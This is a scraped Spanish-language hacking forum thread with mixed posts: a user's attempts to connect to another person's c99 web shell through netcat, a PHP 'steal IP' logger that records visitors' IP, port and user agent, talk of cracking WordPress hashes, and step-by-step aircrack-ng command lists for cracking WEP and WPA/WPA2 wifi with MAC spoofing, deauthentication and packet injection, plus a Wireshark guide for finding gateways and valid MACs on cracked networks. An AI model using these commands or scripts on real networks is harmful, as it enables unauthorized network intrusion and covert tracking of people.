Que onda man! bueno andaba probando y mire tu shell pero no pude entrar aunque los datos para entrar a tu shell fueran user y pass no pude! pero bueno entonces lo que hice fue en la shell que estaba utilizando la c99 le di en bind ahi dice para conectarse bind o backconnect bueno intente con el backconnect pero nada! entonces intente con la bind y cuando estoy conectandome en el netcat me manda conecction refused!
delta.xxxxxxxxx.com.ar [176.31.77.xxx] 11xxx (?): connection refused
Me podrias decir que puedo hacer!
ah por cierto quise intentar subir el reversheshell que pusistes en el server pero no lo encontre no me lo da en el directorio me podrias pasar el nombre de tu shell? para probar igualmente gracias me parecio interesante el articulo y quise probar je! saludos

Excelente tutorial man

Yo lo baje de rapidshare estaba mirando el php pero creo que le falta el de steal ip jeje no se xD! saludos igual este es un gran aporte man gracias por compartirlo asi aprendo yo como hacer uno

copie este trozo de codigo de una web en ingles y se lo agregue xD:

<?php	function GetIP() 
{ 
	if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
		$ip = getenv("HTTP_CLIENT_IP"); 
	else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
		$ip = getenv("HTTP_X_FORWARDED_FOR"); 
	else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
		$ip = getenv("REMOTE_ADDR"); 
	else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
		$ip = $_SERVER['REMOTE_ADDR']; 
	else 
		$ip = "unknown"; 
	return($ip); 
} 
function logData() 
{ 
	$ipLog="ip.txt"; 
	$register_globals = (bool) ini_get('register_gobals'); 
	if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
	else $ip = GetIP(); 

	$rem_port = $_SERVER['REMOTE_PORT']; 
	$user_agent = $_SERVER['HTTP_USER_AGENT']; 
	$date=date ("l dS of F Y h:i:s A"); 
	$log=fopen("$ipLog", "a+"); 

	if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
		fputs($log, "IP: $ip | PORT: $rem_port |  Agent: $user_agent |  DATE{ : } $date <br>"); 
	else 
		fputs($log, "IP: $ip | PORT: $rem_port |  Agent: $user_agent |   DATE: $date  \n\n"); 
	fclose($log); 
} 

logData(); 

?>

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por recolectarlos


Le eché una ojeadita y veo que faltan los papers 2 y 3 de Php que hizo Xt3mP.

Si pueden subanlo y lo agrego

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
uuu orale gracias por la respuesta arthusu
sabes si existe alguna aplicacion o tool que me permita realizar algun tipo de ataque a este tipo de algoritmo??
salu2

No tengo ni idea no se si con john the ripper se pueda xD! pero ps se vale intentar igual un tipo de esas claves puede tardarse años en desencriptar como decia alli Algoritmo: La verdad es que es un circuito llamado el algoritmo MD5 8192 veces.  pero quizas salga otro usuario mas de underc0de que te de la respuesta 

no es esta 

MD5(Wordpress)
Ejemplo: $P$B123456780BhGFYSlUqGyE6ErKErL01
Usado en Wordpress.
Longitud: 34 characters.
Descripción: El hash comienza con la firma $ P $, entonces ahí va uno de los personajes (más a menudo "B" el número), entonces ahí va la sal (8 caracteres al azar, en nuestro Ejemplos En la sal es la cadena "12345678"), seguido por el hash actual.
Algoritmo: La verdad es que es un circuito llamado el algoritmo MD5 8192 veces.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos

Bueno el otra ves andaba buscando los talleres y no los encontraba por ningun lado jeje hasta que los aye tuve que andar adivinando el password que tenia hasta que lo encontre ahora se los subo por mediafire... sin pass

aqui esta el contenido:


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login | You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login | You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

me encantaria que volvieran esos talleres jeje saludos xD

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
gracias, muy interesante, yo uso vmware, y puedo conectar tres maquinas virtuales cada una con una tarjeta de red distinta, por usb, saludos

Esta la mire hace poco:

Esto era lo que estaba buscando al instalar ubuntu server je! :B

En esta página se muestra como configurar VirtualBox para hacer una conexión de "sólo anfitrión" con la cual la máquina virtual puede tener comunicación por red con el anfitrión pero con ningún otro equipo de la red real a la que pertenezca el equipo real (a menos que se configure el anfitrión como router o puente).

Con esta opción nuestro host anfitrión tiene dos tarjetas de red (o más) una real para que se conecte a una red real y una virtual. En la siguiente figura se muestra esta configuración



Con está configuración la máquina anfitrión puede pertenecer a dos redes distintas una virtual y una real.

Aquí puedes ver el video de  configuración.



fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Gracias por el programa el otra ves lo mire ahora vere como usarlo

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola arthusu,


En mi foro se trato un tema similar al tuyo, tal vez lo puedas hacer con VMware.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Saludos

Si me lo suponia que debia ser la maquina virtual a lo mejor si actualizo el virtualbox capas y agarra  je! sino me tendre que instalar vmware pongo el tema como solucionado gracias Stiuvert

por: Otxoa Gilo

DLink directo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

DHCP deshabilitado hallar el Gateway y DNS y MAC aclaro esta guia no es mia solo la comparto

El protocolo de configuración dinámica de Host o DHCP es un protocolo que permite a los administradores de red automatizar y gestionar de manera centralizada la asignación de direcciones del protocolo Internet (IP) en una red de una organización o de un proveedor de servicios de Internet (ISP). Usando el conjunto de protocolos de Internet (TCP/IP), cada ordenador que puede conectarse a Internet necesita una dirección IP exclusiva. Cuando una organización configura los ordenadores de diferentes usuarios para que éstos se conecten a Internet, debe asignar una dirección IP a cada ordenador. Sin DHCP, la dirección IP debe entrarse manualmente en cada ordenador, y si los ordenadores cambian de sitio a otro lugar de la red, hay que introducir una nueva dirección IP. DHCP permite al administrador de la red supervisar y distribuir las direcciones IP de forma centralizada enviando automáticamente una nueva dirección IP cada vez que un ordenador se conecta en un lugar diferente de la red o cuando llama al ISP.


PASO 1 .- capturar paquetes con el airodump con unos megas bastara y si esta cifrado desencriptenlo con la clave wep que hallaron con el aircrack, lo pueden descifrar con el wireshark o con el airdecap



PASO 2.- abrimos nuestra captura con el wireshark recomiendo que se bajen la ultima version ya que en la ultima version se puede descifrar el trafico ,si este esta encryptado activen la opcion wireless toolbar. y en la barrita que les aparece se coloca la clave wep que hallaron con el aircrack y wireshark les desencriptara el trafico , la otra opcion es usar el airdecap y con este desecriptar el trafico.



PASO 3.- bueno una ves abierto la captura el wireshark nos mostrara algo así





PASO 4.- ahora añadimos las columnas que nos faltan



despues te vas la opcion que dice columns y ahi tendras que aumentar la dos columnas faltantes haces clic en NEW y donde dice TITLE le pones un nombre a la columna en mi caso le puse MAC SOURCE en donde dice FORMAT clic en la flechita y veras que te muestra una lista con muchas opciones buscas la que dice HARDWARE SRC ADDR y luego con los botones de UP lo subes hasta donde se ve en la foto luego repites el proceso clic en NEW en TITLE le pones el nombre de MAC DEST en format buscas HARDWARE DEST ADDR y UP la subes hasta donde se ve en la foto
despues clic en APPLY y luego en OK (este era el paso mas dificil espero que se entienda)



PASO 5 .- ahora el wireshark mostrara dos columnas mas las que agragamos se vera así



bueno ya esta casi listo todo .

PASO 6.- debemos activar estas opciones mas tal como esta en la imagen




PASO 7.- el la nueva columna mac source que añadimos podremos ver claramente la Puerta de Enlace o Gateway y tambien podremos ver el DNS que usan y las MAC validas para poder navegar



ordenar la captura haciendo clic en PROTOCOL de wireshark y tenemos que ver los paquetes HTTP y TCP , ahora claramente veremos como viaja el paquete hasta la computadora vean bien el grafico y lo explicare como pueda no soy un experto

el paquete viene de internet pasa por el gateway despues llega a la maquina por eso era importante añadir la colunma MAC SOURCE y activar las opciones que vieron en las foto anterior tambien podran ver claramente el DNS que usan , las MAC validas si es que tiene filtrado MAC,

FIN.- con estas columnas activadas podras descubrir el gateway y los DNS que usan , el rango de IPs de la red y las MAC validas si es que tienen filtrado mac este tutorial es unisex sirve para windows y linux.N1C0142 autor

DESCARGA DE WIRESHARK 1.4.2


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


DESCARGA DE NETSCAN


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Esto tambien se puede en virtual box con el post anterior que les pase como instalar backtrack 5  en virtualbox: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
para activar la red wifi en virtual box solo poner esto:

tengo que decir que no con todas las tarjetas agarra

Importante: Por este motivo si lo que queréis es tener una tarjeta wireless en la maquina virtual (probablemente para hacer maldades) tendréis que enchufar una USB, PCMCIA o ExpressCard y asignarla a la maquina virtual

hackear wep
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Comandos utilizados:

1-iwconfig

2-airmon-ng stop wlan0

3-macchanger -m 00:11:22:33:44:55 wlan0

4-airmon-ng start wlan0

5-airodump-ng wlan0

6-airodump-ng -w ESSID --bssid BSSID --channel x wlan0

7-aireplay-ng -1 0 -e ESSID -a BSSID -h 00:11:22:33:44:55 wlan0 ----eso para autentificarse

8-aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 wlan0 ------eso para inyectar paquetes

9-aircrack-ng redes-01.cap


hackear wap/wap2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si necesitan diccionarios: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Comandos utilizados:

1-iwconfig

2-airmon-ng stop wlan0

3-macchanger -m 00:11:22:33:44:55 wlan0

4-airmon-ng start wlan0

5-airodump-ng wlan0

6-airodump-ng -w ESSID --bssid BSSID --channel x wlan0

7-aireplay-ng -0 10 -a BSSID -c (mac cliente) wlan0

8-aircrack-ng -w (ruta del diccionario) (archivo cap)


Fuente:CyberLocos

Ahora solo seguir los pasos del video y happy hacking  :laugh:

En la imagen de arriba los Lost Packets muchas veces cuando estas juakeando una red wifi los packets los recoge y los lleva a perdidos este articulo es para que te enteres que puede ser  :laugh:
No haye nada sobre esto en la red solo en aircrack y estaba en ingles use google traductor igual se entiende  :laugh:

El número de paquetes de datos perdidos en los últimos 10 segundos basado en el número de secuencia. Véase la nota a continuación para obtener una explicación más detallada.

Las posibles razones para la pérdida de paquetes:

No se puede enviar (en caso de que usted está enviando) y escuchar al mismo tiempo, por lo que cada vez que envíe algo que no puedes escuchar los paquetes que se transmiten en ese intervalo.
Usted tal vez perder paquetes de transmisión de energía por demasiado alto (puede que esté demasiado cerca de la autopista AP).
Hay demasiado ruido en el canal actual (otros puntos de acceso, horno de microondas, bluetooth ...)
Para reducir al mínimo el número de paquetes perdidos, variar su posición física, el tipo de antena que se utiliza, el canal, la velocidad de datos y / o velocidad de inyección.

Esto pasa muchas veces cuando estas intentando juakear una red wifi con el aircrack te salen en el airodump

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Se llama wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado con Wi-Fi, como un portátil o una PDA, para detectar las redes. Esta actividad es parecida al uso de un escáner para radio.

El wardriving recibe su nombre del wardialing (popularizado en la película de Matthew Broderick Juegos de guerra) porque también implica buscar sistemas informáticos.

Muchos practicantes usan dispositivos GPS para determinar la ubicación de los hotspots hallados y registrarla en un sitio web (el más popular es WiGLE). Para mejorar el rango de alcance, se construyen o compran antenas, ya sean omnidireccionales o altamente direccionales. El software necesario se encuentra libremente en Internet, notablemente NetStumbler para Windows, KisMac para Macintosh y Kismet o SWScanner para GNU/Linux.

El uso masivo de PDA y smartphones equipados con Wi-Fi facilitan la práctica del wardriving, además existen versiones especiales de Kismet y NetStumbler para la plataforma Pocket PC, inclusive existe software como WiFiFoFum que conectando un GPS pueden crear una imagen de Radar de las redes circundantes.

Una variante muy interesante y recomendable es el Bus_Wardriving, en la que aprovechando los trayectos de autobús urbano buscamos redes cómodamente reduciendo la emisión de gases y los riesgos de conducir por la ciudad. Esta modalidad plantea un principal problema: la fuente de alimentación está limitada a la propia batería del Portatil o PDA.

FUENTE: WIFIPEDIA

bueno pues seguimos :B

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

se dirigen ahi y hasta les dejo el tuto de la pagina oficial

despues de averlo instalado le dan

file >settings



configuras con tu proxy



ahora le das en new



le pones el nombre que quieras y le das en browser ahi seleccionas el programa a ponerle proxy anterior...



listo tienes tu programa con proxy

bueno veremos como configurar nuestro navegador con una proxy, primero vamos a: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

ahi solo escojes la que tenga mas speed(velocidad) en verde o tambien puedes elegir en countries(ciudades) tu ciudad ver la que tenga mas speed asi sera mas rapido



entonces seleccionada nuestra ip:puerto

para cada navegador es diferente pero igual podemos configurar en chrome....

vamos a la de herramientas(tools) y configuracion...



luego en avanzada > red,cambiar la configuracion de la proxy....



ahi le damos en configuracion lan...



cliqueamos en utilizar proxy y ponemos nuestra poxy:puerto que hayamos antes en hidemyass



damos aceptar y aceptar

listo tenemos configurado con proxy hay que probar que funcione si funciona chingon a la primera, pero sino hay que seguir intentado, otra cosa es que si tiene baja velocidad podemos seguir buscando mas proxys esa pagina se actualiza diario, saludos

PD: la proxy funciona muy bien me quedo con ella :B

n este video les enseñare un review(resumen) basico de process hacker 2 espero que les sea de gran ayuda

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por traerlo, ahora mismo lo estoy descargando, le doy una leida y te posteo una critica del manual!
Saludos y Gracias,, Cronos.-

+
yo llevo una parte leida y donde voi creo que es uno de los mejores manuales que he leido y eso que todavia no acabo jeje, salu2 Cronos.-